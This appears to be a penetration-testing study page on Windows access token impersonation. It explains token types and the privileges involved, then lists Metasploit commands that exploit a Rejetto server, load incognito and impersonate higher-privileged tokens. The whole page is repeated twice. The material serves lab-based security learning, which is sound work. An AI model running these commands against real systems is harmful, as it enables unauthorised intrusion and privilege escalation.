Access Token Impersonation

Windows Access Tokens are like special keys that allow users or programs to access system resources without needing to enter their credentials every time. When a user logs into a Windows system, the winlogon.exe process creates an access token that contains the user’s identity and permissions. This token is attached to the user’s processes, allowing those processes to run with the same permissions. If the user starts any new programs, those will inherit the token as well, granting them access to the system based on the user's privileges. These tokens are managed by the LSASS (Local Security Authority Subsystem Service) service, which ensures that everything runs securely with the correct permissions.

Windows Privileges

When attackers gain initial access to a system, they may try to impersonate access tokens to increase their privileges. However, their success depends on:

The privileges of the compromised account.
The availability of impersonation or delegation tokens.

To carry out a successful impersonation attack, the attacker needs specific privileges, including:

SeAssignPrimaryToken – Allows an attacker to impersonate another user's token.
SeCreateToken – Enables an attacker to create a fake token with administrative privileges.
SeImpersonatePrivilege – Lets an attacker run processes as another user, typically an administrator.

These privileges give attackers the ability to execute commands or access data as higher-privileged users, potentially leading to full system control.

Incognito

nmap [IP]

msfconsole -q
search rejetto
use 0
show options
set RHOSTS [TARGET IP]
exploit

meterpreter> sysinfo
> pgrep explorer
> migrate [PROCESS ID]

# operation will fail

> getuid
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "[TOKEN TO IMPERSONATE]"
# if access is denied - getsystem
# dir C:\Windows\System32\*.txt /s /b
> getuid
> getprivs

PreviousBypassing UAC NextLinux PrivEsc

Last updated 3 months ago

Category

Windows Access Tokens are categorized into different security levels, which determine the privileges associated with the token. The main categories are:

Impersonate-level Tokens: These tokens are created during non-interactive logins, such as when system services or domain logins occur. They can only be used to impersonate a user on the local system, not on external systems.

Delegate-level Tokens: These tokens are created during interactive logins, such as when a user logs in directly or remotely through protocols like RDP. Delegate-level tokens are more powerful, as they can be used to impersonate a user on both the local system and external systems, making them a higher security risk.

In short, impersonate-level tokens are limited to local use, while delegate-level tokens allow broader access across systems.

Windows Privileges

When attackers gain initial access to a system, they may try to impersonate access tokens to increase their privileges. However, their success depends on:

The privileges of the compromised account.

The availability of impersonation or delegation tokens.

To carry out a successful impersonation attack, the attacker needs specific privileges, including:

SeAssignPrimaryToken – Allows an attacker to impersonate another user's token.

SeCreateToken – Enables an attacker to create a fake token with administrative privileges.

SeImpersonatePrivilege – Lets an attacker run processes as another user, typically an administrator.

These privileges give attackers the ability to execute commands or access data as higher-privileged users, potentially leading to full system control.

Incognito

nmap [IP]

msfconsole -q
search rejetto
use 0
show options
set RHOSTS [TARGET IP]
exploit

meterpreter> sysinfo
> pgrep explorer
> migrate [PROCESS ID]

# operation will fail

> getuid
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "[TOKEN TO IMPERSONATE]"
# if access is denied - getsystem
# dir C:\Windows\System32\*.txt /s /b
> getuid
> getprivs